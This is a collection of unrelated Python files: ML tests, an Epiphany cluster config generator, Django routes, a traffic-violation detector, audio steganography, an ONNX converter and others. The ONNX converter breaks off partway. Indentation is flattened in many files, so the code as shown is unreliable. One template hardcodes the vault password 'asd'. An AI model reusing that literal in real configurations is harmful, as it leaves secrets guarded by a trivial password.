assert np.all(result.importances_mean[-1] > result.importances_mean[:-1])
def test_permutation_importance_linear_regresssion():
X, y = make_regression(n_samples=500, n_features=10, random_state=0)
X = scale(X)
y = scale(y)
lr = LinearRegression().fit(X, y)
# this relationship can be computed in closed form
expected_importances = 2 * lr.coef_**2
results = permutation_importance(lr, X, y,
n_repeats=50,
scoring='neg_mean_squared_error')
assert_allclose(expected_importances, results.importances_mean,
rtol=1e-1, atol=1e-6)
def test_permutation_importance_equivalence_sequential_parallel():
# regression test to make sure that sequential and parallel calls will
# output the same results.
X, y = make_regression(n_samples=500, n_features=10, random_state=0)
lr = LinearRegression().fit(X, y)
importance_sequential = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=1
)
# First check that the problem is structured enough and that the model is
# complex enough to not yield trivial, constant importances:
imp_min = importance_sequential['importances'].min()
imp_max = importance_sequential['importances'].max()
assert imp_max - imp_min > 0.3
    # Then actually check that parallelism does not impact the results
# either with shared memory (threading) or without isolated memory
# via process-based parallelism using the default backend
# ('loky' or 'multiprocessing') depending on the joblib version:
# process-based parallelism (by default):
importance_processes = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=2)
assert_allclose(
importance_processes['importances'],
importance_sequential['importances']
)
# thread-based parallelism:
with parallel_backend("threading"):
importance_threading = permutation_importance(
lr, X, y, n_repeats=5, random_state=0, n_jobs=2
)
assert_allclose(
importance_threading['importances'],
importance_sequential['importances']
)
@pytest.mark.parametrize("n_jobs", [None, 1, 2])
def test_permutation_importance_equivalence_array_dataframe(n_jobs):
    # This test checks that the column shuffling logic has the same behavior
    # on both a dataframe and a simple numpy array.
pd = pytest.importorskip('pandas')
# regression test to make sure that sequential and parallel calls will
# output the same results.
X, y = make_regression(n_samples=100, n_features=5, random_state=0)
X_df = pd.DataFrame(X)
# Add a categorical feature that is statistically linked to y:
binner = KBinsDiscretizer(n_bins=3, encode="ordinal")
cat_column = binner.fit_transform(y.reshape(-1, 1))
# Concatenate the extra column to the numpy array: integers will be
# cast to float values
X = np.hstack([X, cat_column])
assert X.dtype.kind == "f"
# Insert extra column as a non-numpy-native dtype (while keeping backward
# compat for old pandas versions):
if hasattr(pd, "Categorical"):
cat_column = pd.Categorical(cat_column.ravel())
else:
cat_column = cat_column.ravel()
new_col_idx = len(X_df.columns)
X_df[new_col_idx] = cat_column
assert X_df[new_col_idx].dtype == cat_column.dtype
    # Stitch an arbitrary index to the dataframe:
X_df.index = np.arange(len(X_df)).astype(str)
rf = RandomForestRegressor(n_estimators=5, max_depth=3, random_state=0)
rf.fit(X, y)
n_repeats = 3
importance_array = permutation_importance(
rf, X, y, n_repeats=n_repeats, random_state=0, n_jobs=n_jobs
)
# First check that the problem is structured enough and that the model is
# complex enough to not yield trivial, constant importances:
imp_min = importance_array['importances'].min()
imp_max = importance_array['importances'].max()
assert imp_max - imp_min > 0.3
    # Now check that importances computed on the dataframe match the values
    # of those computed on the array with the same data.
importance_dataframe = permutation_importance(
rf, X_df, y, n_repeats=n_repeats, random_state=0, n_jobs=n_jobs
)
assert_allclose(
importance_array['importances'],
importance_dataframe['importances']
)
@pytest.mark.parametrize("input_type", ["array", "dataframe"])
def test_permutation_importance_large_memmaped_data(input_type):
# Smoke, non-regression test for:
# https://github.com/scikit-learn/scikit-learn/issues/15810
n_samples, n_features = int(5e4), 4
X, y = make_classification(n_samples=n_samples, n_features=n_features,
random_state=0)
    assert X.nbytes > 1e6  # trigger joblib memmapping
X = _convert_container(X, input_type)
clf = DummyClassifier(strategy='prior').fit(X, y)
# Actual smoke test: should not raise any error:
n_repeats = 5
r = permutation_importance(clf, X, y, n_repeats=n_repeats, n_jobs=2)
# Auxiliary check: DummyClassifier is feature independent:
    # permuting a feature should not change the predictions
expected_importances = np.zeros((n_features, n_repeats))
assert_allclose(expected_importances, r.importances)
|
"""Implementation of the "init" method."""
import sys
from ._helpers import (get_path, combine, dictify, undictify,
load_yaml, dump_yaml, dump_yaml_into_str, to_literal_scalar)
# The standard "minimal-cluster-config.yml" is not used here because
# it contains too many extra documents
MINIMAL_EPIPHANY_CLUSTER = '''
kind: epiphany-cluster
title: Epiphany cluster Config
name: TO_BE_SET
provider: any
specification:
name: TO_BE_SET
admin_user:
name: operations
key_path: TO_BE_SET
cloud:
k8s_as_cloud_service: true
components:
repository:
count: 1
kubernetes_master:
count: 0
kubernetes_node:
count: 0
logging:
count: 0
monitoring:
count: 0
kafka:
count: 0
postgresql:
count: 1
load_balancer:
count: 0
rabbitmq:
count: 0
'''
# Extend feature mapping of repository to enable applications
MINIMAL_FEATURE_MAPPING = '''
kind: configuration/feature-mapping
title: Feature mapping to roles
name: TO_BE_SET
provider: any
specification:
roles_mapping:
repository:
- repository
- image-registry
- firewall
- filebeat
- node-exporter
- applications
'''
# Original one seems to be incorrect:
# https://github.com/epiphany-platform/epiphany/issues/1743
VIRTUAL_MACHINE_TEMPLATE = '''
kind: infrastructure/machine
name: TO_BE_SET
provider: any
specification:
hostname: TO_BE_SET
ip: TO_BE_SET
'''
INITIAL_MODULE_STATE = '''
kind: state
{M_MODULE_SHORT}:
status: initialized
'''
INITIAL_MODULE_CONFIG = '''
kind: {M_MODULE_SHORT}-config
{M_MODULE_SHORT}:
vault_password: "asd"
'''
def _get_enabled_components(cluster):
"""Get all components with non-zero "count"."""
return [
(key, value)
for key, value in cluster["specification"]["components"].items()
if int(value["count"]) > 0
]
def _get_dummy_machines(cluster):
"""Generate dummy virtual machine documents."""
count = sum(
value["count"]
for _, value in _get_enabled_components(cluster)
)
return [
combine(load_yaml(VIRTUAL_MACHINE_TEMPLATE), {
"name": "default-vm-" + str(index + 1),
})
for index in range(count)
]
def _process_cluster(v):
"""Process the main cluster document."""
return combine(load_yaml(MINIMAL_EPIPHANY_CLUSTER), {
"name": v["M_MODULE_SHORT"],
"provider": "any",
"specification": {
"name": v["M_MODULE_SHORT"],
"admin_user": {
"key_path": str(v["shared_dir"] / v["VMS_RSA_FILENAME"]),
},
},
})
def _process_feature_mapping(v):
"""Process feature mapping (enable applications)."""
return combine(load_yaml(MINIMAL_FEATURE_MAPPING), {
"name": v["M_MODULE_SHORT"],
"provider": "any",
})
def _process_machines(v, cluster):
"""Process virtual machines."""
def read_vms_from_state_file():
state = load_yaml(v["state_file"])["azbi"]
output = state["output"]
vm_names = output["vm_names.value"]
if state["use_public_ip"]:
vm_ips = output["public_ips.value"]
else:
vm_ips = output["private_ips.value"]
return zip(vm_names, vm_ips)
def derive_machines(vms):
return [
combine(load_yaml(VIRTUAL_MACHINE_TEMPLATE), {
"name": "default-" + vm_name,
"provider": "any",
"specification": {
"hostname": vm_name,
"ip": vm_ip,
},
})
for vm_name, vm_ip in vms
]
def assign_machines_to_components(machines, cluster):
number_of_required_vms = sum(
int(value["count"])
for _, value in _get_enabled_components(cluster)
)
if number_of_required_vms > len(machines):
raise Exception("not enough vms available")
# Convert virtual machine list to iterator
machines = iter(machines)
return combine(cluster, {
"specification": {
"components": {
key: {
"machines": [
next(machines)["name"]
for _ in range(int(value["count"]))
],
}
for key, value in _get_enabled_components(cluster)
},
},
})
try:
# Read data from the state file
vms = read_vms_from_state_file()
machines = derive_machines(vms)
except (FileNotFoundError, KeyError):
# Fallback to dummy values if there is no state to read
vms = []
machines = _get_dummy_machines(cluster)
cluster = assign_machines_to_components(machines, cluster)
return machines, cluster
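# Illustrative example of the assignment above: with enabled components
# {"repository": {"count": 1}, "postgresql": {"count": 1}} and machines named
# ["default-vm-1", "default-vm-2"], assign_machines_to_components() walks the enabled
# components in order and consumes the machine iterator, so repository ends up with
# machines == ["default-vm-1"] and postgresql with machines == ["default-vm-2"].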
def _process_components(v, cluster):
"""Process component defaults."""
return [
combine(load_yaml(v["template_dir"] / "configuration" / (key + ".yml")), {
"provider": "any",
})
for key, _ in _get_enabled_components(cluster)
]
def _process_applications(v):
"""Process application defaults."""
template = load_yaml(
v["template_dir"] / "configuration" / "applications.yml")
# Add provider key
document = combine(template, {
"provider": "any",
})
# Convert list-based dictionary to real one (makes merging possible)
applications = dictify(
document["specification"]["applications"])
    # Make sure user gets defaults appropriate for cloud Kubernetes
applications = combine(applications, {
key: {
"use_local_image_registry": False,
}
for key, value in applications.items()
if "use_local_image_registry" in value
})
return combine(document, {
"specification": {
# Convert-back to list-based dictionary
"applications": undictify(applications),
},
})
def _update_state_file(v):
"""Add module's state to the state file."""
try:
state = load_yaml(v["state_file"])
except FileNotFoundError:
state = {}
state = combine(state, load_yaml(INITIAL_MODULE_STATE.format(**v).strip()))
with v["state_file"].open("w") as stream:
dump_yaml(state, stream=stream)
def _output_data(v, documents):
"""Save and display generated config."""
v["module_dir"].mkdir(parents=True, exist_ok=True)
if v["config_file"].exists():
v["config_file"].rename(v["backup_file"])
config = load_yaml(INITIAL_MODULE_CONFIG.format(**v).strip())
output = dump_yaml_into_str(documents)
config = combine(config, {
v["M_MODULE_SHORT"]: {
"config": to_literal_scalar(output),
},
})
with v["config_file"].open("w") as stream:
dump_yaml(config, stream=stream)
dump_yaml(config, stream=sys.stdout)
def main(variables={}):
"""Handle init method."""
# Compute paths
v = variables
v["shared_dir"] = get_path(v["M_SHARED"])
v["template_dir"] = get_path(v["M_TEMPLATES"])
v["module_dir"] = get_path(
str(v["shared_dir"] / v["M_MODULE_SHORT"]))
v["config_file"] = get_path(
str(v["module_dir"] / v["M_CONFIG_NAME"]))
v["state_file"] = get_path(
str(v["shared_dir"] / v["M_STATE_FILE_NAME"]))
v["backup_file"] = get_path(
str(v["module_dir"] / (v["M_CONFIG_NAME"] + ".backup")))
cluster = _process_cluster(v)
mapping = _process_feature_mapping(v)
machines, cluster = _process_machines(v, cluster)
components = _process_components(v, cluster)
applications = _process_applications(v)
_output_data(v, [cluster] + [mapping]
+ machines
+ components
+ [applications])
_update_state_file(v)
|
from django.urls import path
from . import views
'''
This file specifies the mapping between urls and views
Note: The "name" parameter is used in tests to decouple the urls from the tests. This means that you can change the urls
without affecting the tests, as long as the name parameter is unchanged.
'''
app_name = 'backend'
urlpatterns = [
path('filter/get_matching_clips', views.filter_get_matching_clips, name='filter get matching'),
path('filter/modify', views.filter_modify, name='filter modify'),
path('project/get_all', views.project_get_all, name='project get all'),
path('project/new', views.project_new, name='project new'),
path('project/delete', views.project_delete, name='project delete'),
path('project/rename', views.project_rename, name='project rename'),
path('export/filter', views.export_filter, name='export filter'),
path('export/clips', views.export_clips, name='export clips'),
path('video/get_info', views.video_get_info, name='video info'),
path('video/get_cameras', views.video_get_cameras, name='video get cameras'),
path('file/get_folders', views.file_get_folders, name='file get folders'),
path('file/add_folder', views.file_add_folder, name='file add folder'),
path('object_detection/detect_objects', views.detect_objects, name='detect objects'),
path('object_detection/get_progress', views.get_progress, name='get progress'),
path('object_detection/delete_progress', views.delete_progress, name='delete progress'),
]
|
import tkinter
from tkinter import *
import cv2
import PIL.Image, PIL.ImageTk
import time
import argparse
import os
from keras import backend as K
import tensorflow as tf
from scipy.spatial import distance as dist
from imutils.video import VideoStream
from imutils import face_utils
from threading import Thread
import numpy as np
import playsound
import imutils
import dlib
import pickle
import pyttsx3
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from collections import deque
from src.vehicles.number_plate_recognition.number_plate_recognition_service import NumberPlateRecognitionService
class SpeedLimitsViolationService:
def __init__(self, args):
# modules
self.number_plate_recognition_service = NumberPlateRecognitionService()
# variables
self.violators_queue = deque(maxlen=3)
self.last_time_violated = dict()
self.num_violations = 0
def find_by_id(self, detection_queue, car_id):
for obj in detection_queue:
if obj['id'] == car_id:
                return obj
return None
def process(self, prev_ego_state, ego_state, frame_queue, detection_queue, current_car_ids, curr_time, dt, max_speed):
new_violation_candidates = set()
result_violators = set()
# find violators
for car_id in current_car_ids:
if len(detection_queue) < 2 or self.find_by_id(detection_queue[-2], car_id) is None:
continue
prev_car_state = self.find_by_id(detection_queue[-2], car_id)
curr_car_state = self.find_by_id(detection_queue[-1], car_id)
prev_car_x = prev_car_state['center'][0] + prev_ego_state['position_x']
prev_car_y = prev_car_state['center'][1] + prev_ego_state['position_y']
curr_car_x = curr_car_state['center'][0] + ego_state['position_x']
curr_car_y = curr_car_state['center'][1] + ego_state['position_y']
pos_shift_x, pos_shift_y = abs(curr_car_x - prev_car_x), abs(curr_car_y - prev_car_y)
pos_shift = np.sqrt(pos_shift_x ** 2 + pos_shift_y ** 2)
speed = pos_shift / dt
if speed >= max_speed + 20:
new_violation_candidates.add(car_id)
self.num_violations += 1
print("Warning! Speed limit violation detected.")
if (len(self.violators_queue) >= 2) and (car_id in self.violators_queue[-1]) and \
(car_id in self.violators_queue[-2]) and (car_id not in self.last_time_violated or \
curr_time - self.last_time_violated[car_id] > 60):
                    result_violators.add(car_id)
self.last_time_violated[car_id] = curr_time
self.violators_queue.append(new_violation_candidates)
# recognize number plates
for car_id in result_violators:
det = self.find_by_id(detection_queue[-1], car_id)
x_min, y_min, x_max, y_max = det['2d_bbox']
x_min = max(0, x_min - 50)
y_min = max(0, y_min - 50)
x_max = min(frame_queue[-1].shape[1] - 1, x_max + 50)
y_max = min(frame_queue[-1].shape[0] - 1, y_max + 50)
            crop = frame_queue[-1][y_min: y_max + 1, x_min: x_max + 1, :]  # rows are y, columns are x
number_plate = self.number_plate_recognition_service.process(crop)['number_plate']
if number_plate is not None:
pickle_data = {'type': "speed limit violation", 'number plate': number_plate, 'frames': frame_queue}
pickle_path = f"database/speed_limit_violations/{self.num_violations}.pkl"
pickle.dump(pickle_data, open(pickle_path, 'wb'))
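# Worked example of the thresholding in process() (illustrative numbers only):
# with dt = 0.1 s and max_speed = 25, a car whose world-frame center moves from
# (0, 0) to (3, 4) between consecutive detections has pos_shift = sqrt(3**2 + 4**2) = 5,
# so speed = 5 / 0.1 = 50 >= max_speed + 20 = 45 and the car id becomes a violation
# candidate; it is only reported (and its plate read) once it has been a candidate in
# three consecutive frames and has not been reported within the last 60 seconds.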
|
"""
like batched_inv, but this implementation runs the sparse matrix stuff in a set of separate processes to speed things up.
"""
import numpy as np
import wmf
import batched_inv
import multiprocessing as mp
import Queue
import time
def buffered_gen_mp(source_gen, buffer_size=2, sleep_time=1):
"""
Generator that runs a slow source generator in a separate process.
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
buffer = mp.Queue(maxsize=buffer_size)
def _buffered_generation_process(source_gen, buffer):
while True:
# we block here when the buffer is full. There's no point in generating more data
# when the buffer is full, it only causes extra memory usage and effectively
# increases the buffer size by one.
while buffer.full():
# print "DEBUG: buffer is full, waiting to generate more data."
time.sleep(sleep_time)
try:
data = source_gen.next()
except StopIteration:
# print "DEBUG: OUT OF DATA, CLOSING BUFFER"
buffer.close() # signal that we're done putting data in the buffer
break
buffer.put(data)
process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
process.start()
while True:
try:
# yield buffer.get()
# just blocking on buffer.get() here creates a problem: when get() is called and the buffer
# is empty, this blocks. Subsequently closing the buffer does NOT stop this block.
# so the only solution is to periodically time out and try again. That way we'll pick up
# on the 'close' signal.
try:
yield buffer.get(True, timeout=sleep_time)
except Queue.Empty:
if not process.is_alive():
break # no more data is going to come. This is a workaround because the buffer.close() signal does not seem to be reliable.
# print "DEBUG: queue is empty, waiting..."
pass # ignore this, just try again.
except IOError: # if the buffer has been closed, calling get() on it will raise IOError.
# this means that we're done iterating.
# print "DEBUG: buffer closed, stopping."
break
class CallableObject(object):
"""
Hack for multiprocessing stuff. This creates a callable wrapper object
with a single argument, that calls the original function with this argument
plus any other arguments passed at creation time.
"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __call__(self, arg):
return self.func(arg, *self.args, **self.kwargs)
def get_row(S, i):
lo, hi = S.indptr[i], S.indptr[i + 1]
return S.data[lo:hi], S.indices[lo:hi]
def build_batch(b, S, Y_e, b_y, byY, YTYpR, batch_size, m, f, dtype):
lo = b * batch_size
hi = min((b + 1) * batch_size, m)
current_batch_size = hi - lo
A_stack = np.empty((current_batch_size, f + 1), dtype=dtype)
B_stack = np.empty((current_batch_size, f + 1, f + 1), dtype=dtype)
for ib, k in enumerate(xrange(lo, hi)):
s_u, i_u = get_row(S, k)
Y_u = Y_e[i_u] # exploit sparsity
b_y_u = b_y[i_u]
A = (s_u + 1).dot(Y_u)
A -= np.dot(b_y_u, (Y_u * s_u[:, None]))
A -= byY
YTSY = np.dot(Y_u.T, (Y_u * s_u[:, None]))
B = YTSY + YTYpR
A_stack[ib] = A
B_stack[ib] = B
return A_stack, B_stack
def recompute_factors_bias_batched_mp(Y, S, lambda_reg, dtype='float32', batch_size=1, solve=batched_inv.solve_sequential, num_batch_build_processes=4):
m = S.shape[0] # m = number of users
f = Y.shape[1] - 1 # f = number of factors
b_y = Y[:, f] # vector of biases
Y_e = Y.copy()
Y_e[:, f] = 1 # factors with added column of ones
YTY = np.dot(Y_e.T, Y_e) # precompute this
R = np.eye(f + 1) # regularization matrix
R[f, f] = 0 # don't regularize the biases!
R *= lambda_reg
YTYpR = YTY + R
byY = np.dot(b_y, Y_e) # precompute this as well
X_new = np.zeros((m, f + 1), dtype=dtype)
num_batches = int(np.ceil(m / float(batch_size)))
func = CallableObject(build_batch, S, Y_e, b_y, byY, YTYpR, batch_size, m, f, dtype)
pool = mp.Pool(num_batch_build_processes)
batch_gen = pool.imap(func, xrange(num_batches))
    batch_gen_buffered = buffered_gen_mp(batch_gen, buffer_size=2, sleep_time=0.001)
    # iterate the buffered generator so batches keep being built in the background
    for b, (A_stack, B_stack) in enumerate(batch_gen_buffered):
lo = b * batch_size
hi = min((b + 1) * batch_size, m)
X_stack = solve(A_stack, B_stack)
X_new[lo:hi] = X_stack
return X_new
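if __name__ == '__main__':
    # Minimal usage sketch for buffered_gen_mp (illustrative only, not part of the
    # original module): wrap a deliberately slow source generator so that items are
    # pre-generated in a separate process while the consumer does other work.
    def slow_source(n=5, delay=0.2):
        for i in range(n):
            time.sleep(delay)  # simulate expensive per-item work
            yield i

    print(list(buffered_gen_mp(slow_source(), buffer_size=2, sleep_time=0.05)))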
|
from audio.insertor import Inserter
from helper.file import File
file_dir = 'sample/audio/StarWars3.wav'
secret_message_dir = 'sample/text/message.txt'
key = "kuncirahasia"
insert = Inserter(file_dir, secret_message_dir, key)
frame_modified = insert.insert_message(
randomize_bytes=False,
randomize_frames=False,
encrypted=False,
)
output_filename = 'output/output.wav'
output_file = File(output_filename)
output_file.write_audio_file(frame_modified, insert.params)
|
from pyglottolog.links import endangeredlanguages, wikidata
def test_el(elcat):
res = endangeredlanguages.read()
assert len(res) == 1
assert len(res[0].coordinates) == 1
assert res[0].url.endswith('1')
def test_wikidata(mocker, api_copy):
class wd(object):
def post(self, *args, **kw):
return mocker.Mock(text='glottocode,item,wikipedia\nabcd1235,http://example.org,xyz')
langs = {l.id: l for l in api_copy.languoids()}
mocker.patch('pyglottolog.links.wikidata.requests', wd())
assert list(wikidata.Wikidata().iterupdated(langs.values()))
assert 'https://example.org' in [l.url for l in langs['abcd1235'].links]
assert not list(wikidata.Wikidata().iterupdated(langs.values()))
|
#!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
if "__main__" == __name__:
setup(
author="Hao-Ting Wang",
author_email='htwangtw@gmail.com',
python_requires='>=3.7',
description="Crawl public BIDS dataset on AWS to datalad",
name='publiccrawler',
packages=find_packages(),
version='0.1.0',
install_requires=['boto', 'click'],
entry_points='''
[console_scripts]
s3crawler=publiccrawler.crawler:cli
''',
)
|
"""
A threaded shared-memory scheduler
See async.py
"""
from __future__ import absolute_import, division, print_function
from multiprocessing.pool import ThreadPool
from threading import current_thread
from .async import get_async, inc, add
from .compatibility import Queue
from .context import _globals
default_pool = ThreadPool()
def _thread_get_id():
return current_thread().ident
def get(dsk, result, cache=None, **kwargs):
""" Threaded cached implementation of dask.get
Parameters
----------
dsk: dict
A dask dictionary specifying a workflow
result: key or list of keys
Keys corresponding to desired data
nthreads: integer of thread count
The number of threads to use in the ThreadPool that will actually execute tasks
cache: dict-like (optional)
Temporary storage of results
Examples
--------
>>> dsk = {'x': 1, 'y': 2, 'z': (inc, 'x'), 'w': (add, 'z', 'y')}
>>> get(dsk, 'w')
4
>>> get(dsk, ['w', 'y'])
(4, 2)
"""
pool = _globals['pool']
if pool is None:
pool = default_pool
queue = Queue()
results = get_async(pool.apply_async, len(pool._pool), dsk, result,
cache=cache, queue=queue, get_id=_thread_get_id,
**kwargs)
return results
|
import numpy as np
from cogue.crystal.utility import klength2mesh
class Imaginary:
def __init__(self,
phonon,
distance=200):
self._phonon = phonon # Phonopy object
self._lattice = np.array(phonon.get_unitcell().get_cell().T,
dtype='double')
self._mesh = None
self._ratio = None
self._set_mesh(distance=distance)
self._run_mesh_sampling()
self._search_imaginary_qpoint_ratio()
def get_imaginary_qpoint_ratio(self):
return self._ratio
def get_lattice(self):
return self._lattice
def get_mesh(self):
return self._mesh
def _set_mesh(self, distance=200):
self._mesh = klength2mesh(distance, self._lattice)
def _run_mesh_sampling(self):
self._phonon.set_mesh(self._mesh)
def _search_imaginary_qpoint_ratio(self):
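        # Fraction of the Brillouin-zone sampling weight carried by q-points whose
        # lowest band is imaginary (reported by phonopy as a negative frequency),
        # relative to the total number of mesh points.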
_, weights, freqs, _ = self._phonon.get_mesh()
self._ratio = (float(np.extract(freqs[:, 0] < 0, weights).sum()) /
np.prod(self._mesh))
if __name__ == '__main__':
import sys
import yaml
from phonopy import Phonopy
from phonopy.interface.phonopy_yaml import phonopyYaml
from phonopy.file_IO import parse_FORCE_SETS
from cogue.crystal.utility import get_angles, get_lattice_parameters
import matplotlib
if len(sys.argv) > 1:
cell = phonopyYaml(sys.argv[1]).get_atoms()
else:
cell = phonopyYaml("POSCAR-unitcell.yaml").get_atoms()
phonon_info = yaml.load(open("phonon.yaml"))
phonon = Phonopy(cell,
phonon_info['supercell_matrix'],
is_auto_displacements=False)
force_sets = parse_FORCE_SETS()
phonon.set_displacement_dataset(force_sets)
phonon.produce_force_constants()
distance = 200
imaginary = Imaginary(phonon, distance=distance)
lattice = imaginary.get_lattice()
print "lattice_lengths: [ %f, %f, %f ]" % tuple(get_lattice_parameters(lattice))
print "lattice_angles: [ %f, %f, %f ]" % tuple(get_angles(lattice))
print "mesh_length: %f" % distance
print "mesh: [ %d, %d, %d ]" % tuple(imaginary.get_mesh())
print "ratio: %f" % imaginary.get_imaginary_qpoint_ratio()
|
import unittest
from my_test_api import TestAPI
class TestCreateIssue(TestAPI):
def test_create_issue(self):
params = {
'project': 'API',
'summary': 'test issue by robots',
'description': 'You are mine ! ',
}
response = self.put('/issue/', params)
issue_id = response.headers['Location'].split('/')[-1]
print('Created item ID is ', issue_id)
self.assertEquals(response.status_code, 201)
response = self.get('/issue/' + issue_id)
self.assertEquals(response.status_code, 200)
if __name__ == '__main__':
unittest.main()
|
import imageio
import os
filenames=sorted((fn for fn in os.listdir('.') if fn.endswith('.png')))
print(filenames)
images = []
for filename in filenames:
images.append(imageio.imread(filename))
imageio.mimsave('run_2_anom.gif', images)
|
import unittest
from geom2d import Point, Size, Rect
from graphic.svg.image import svg_content
class TestSvgImage(unittest.TestCase):
size = Size(200, 350)
viewbox = Rect(Point(4, 5), Size(180, 230))
def test_parse_width(self):
svg = svg_content(self.size, [])
self.assertTrue('width="200"' in svg)
def test_parse_height(self):
svg = svg_content(self.size, [])
self.assertTrue('height="350"' in svg)
def test_parse_default_viewbox(self):
svg = svg_content(self.size, [])
self.assertTrue('viewBox="0 0 200 350"' in svg)
def test_parse_viewbox(self):
svg = svg_content(self.size, [], self.viewbox)
self.assertTrue('viewBox="4 5 180 230"' in svg)
|
import numpy as np
import onnx
from collections import defaultdict
from typing import Any, Dict, List, Union
from .. import operations
from ..graph import OperationGraph
from ..operations import Operation
from ..utils import NUMPY_TO_ONNX_DTYPE
from ..visitors import OperationVisitor
def convert(op_graph: OperationGraph):
converter = OnnxConverter(op_graph)
model = converter.convert()
return model
class OnnxConverter(OperationVisitor):
def __init__(self, op_graph: OperationGraph):
self.op_graph = op_graph
self.inputs: List[onnx.ValueInfoProto] = []
self.outputs: List[onnx.ValueInfoProto] = []
self.initializer: List[onnx.TensorProto] = []
self.visited: Dict[Operation, onnx.NodeProto] = {}
self.op_counts: Dict[str, int] = defaultdict(int)
def convert(self, name="onnx_model") -> onnx.ModelProto:
output_details = self.op_graph.output_details
for op, (shape, dtype) in zip(self.op_graph.output_operations, output_details):
output_op = self.visit(op)
node = onnx.helper.make_tensor_value_info(
output_op.name, NUMPY_TO_ONNX_DTYPE[dtype], shape
)
self.outputs.append(node)
nodes = [n for n in self.visited.values() if isinstance(n, onnx.NodeProto)]
graph_def = onnx.helper.make_graph(
nodes,
name,
self.inputs,
self.outputs,
initializer=self.initializer,
)
model_def = onnx.helper.make_model(graph_def, producer_name="dnnv")
model_def = onnx.shape_inference.infer_shapes(model_def)
onnx.checker.check_model(model_def)
return model_def
def visit(self, operation: Operation) -> Union[onnx.NodeProto, onnx.ValueInfoProto]:
if operation not in self.visited:
result = super().visit(operation)
self.visited[operation] = result
return self.visited[operation]
def generic_visit(self, operation: Operation):
if not hasattr(self, "visit_%s" % operation.__class__.__name__):
raise ValueError(
"ONNX converter not implemented for operation type %s"
% operation.__class__.__name__
)
return super().generic_visit(operation)
def _to_onnx_proto(
self, value: Any, opname: str
) -> Union[onnx.NodeProto, onnx.TensorProto, onnx.ValueInfoProto]:
if isinstance(value, Operation):
return self.visit(value)
elif isinstance(value, np.ndarray):
tensor_proto = onnx.numpy_helper.from_array(value, name=opname)
self.initializer.append(tensor_proto)
return tensor_proto
raise ValueError(f"Unknown type for operand of {opname}: {type(value)}")
def visit_Add(self, operation: operations.Add) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_AveragePool(self, operation: operations.AveragePool) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
op_type,
inputs=[x.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
ceil_mode=operation.ceil_mode,
count_include_pad=operation.count_include_pad,
strides=list(operation.strides),
pads=list(operation.pads),
name=opname,
)
return node
def visit_BatchNormalization(
self, operation: operations.BatchNormalization
) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
scale = self._to_onnx_proto(operation.scale, f"{opname}.scale")
bias = self._to_onnx_proto(operation.bias, f"{opname}.bias")
mean = self._to_onnx_proto(operation.mean, f"{opname}.mean")
variance = self._to_onnx_proto(operation.variance, f"{opname}.variance")
node = onnx.helper.make_node(
op_type,
inputs=[x.name, scale.name, bias.name, mean.name, variance.name],
outputs=[opname],
epsilon=operation.epsilon,
momentum=operation.momentum,
name=opname,
)
return node
def visit_Conv(self, operation: operations.Conv) -> onnx.NodeProto:
idx = self.op_counts["Conv"] = self.op_counts["Conv"] + 1
opname = f"Conv_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
w = self._to_onnx_proto(operation.w, f"{opname}.w")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
"Conv",
inputs=[x.name, w.name, b.name],
outputs=[opname],
kernel_shape=list(operation.kernel_shape),
strides=list(operation.strides),
dilations=list(operation.dilations),
group=operation.group,
pads=list(operation.pads),
name=opname,
)
return node
def visit_Concat(self, operation: operations.Concat) -> onnx.NodeProto:
idx = self.op_counts["Concat"] = self.op_counts["Concat"] + 1
opname = f"Concat_{idx}"
inputs = [
self._to_onnx_proto(x, f"{opname}.x{i}") for i, x in enumerate(operation.x)
]
node = onnx.helper.make_node(
"Concat",
inputs=[x.name for x in inputs],
outputs=[opname],
axis=operation.axis,
name=opname,
)
return node
def visit_Div(self, operation: operations.Div) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
node = onnx.helper.make_node(
op_type,
inputs=[a.name, b.name],
outputs=[opname],
name=opname,
)
return node
def visit_Flatten(self, operation: operations.Flatten) -> onnx.NodeProto:
idx = self.op_counts["Flatten"] = self.op_counts["Flatten"] + 1
opname = f"Flatten_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
node = onnx.helper.make_node(
"Flatten",
inputs=[x.name],
outputs=[opname],
axis=operation.axis,
name=opname,
)
return node
def visit_Gemm(self, operation: operations.Gemm) -> onnx.NodeProto:
idx = self.op_counts["Gemm"] = self.op_counts["Gemm"] + 1
opname = f"Gemm_{idx}"
a = self._to_onnx_proto(operation.a, f"{opname}.a")
b = self._to_onnx_proto(operation.b, f"{opname}.b")
c = self._to_onnx_proto(operation.c, f"{opname}.c")
node = onnx.helper.make_node(
"Gemm",
inputs=[a.name, b.name, c.name],
outputs=[opname],
alpha=operation.alpha,
beta=operation.beta,
transA=operation.transpose_a,
transB=operation.transpose_b,
name=opname,
)
return node
def visit_GlobalAveragePool(
self, operation: operations.GlobalAveragePool
) -> onnx.NodeProto:
op_type = str(operation)
idx = self.op_counts[op_type] = self.op_counts[op_type] + 1
opname = f"{op_type}_{idx}"
x = self._to_onnx_proto(operation.x, f"{opname}.x")
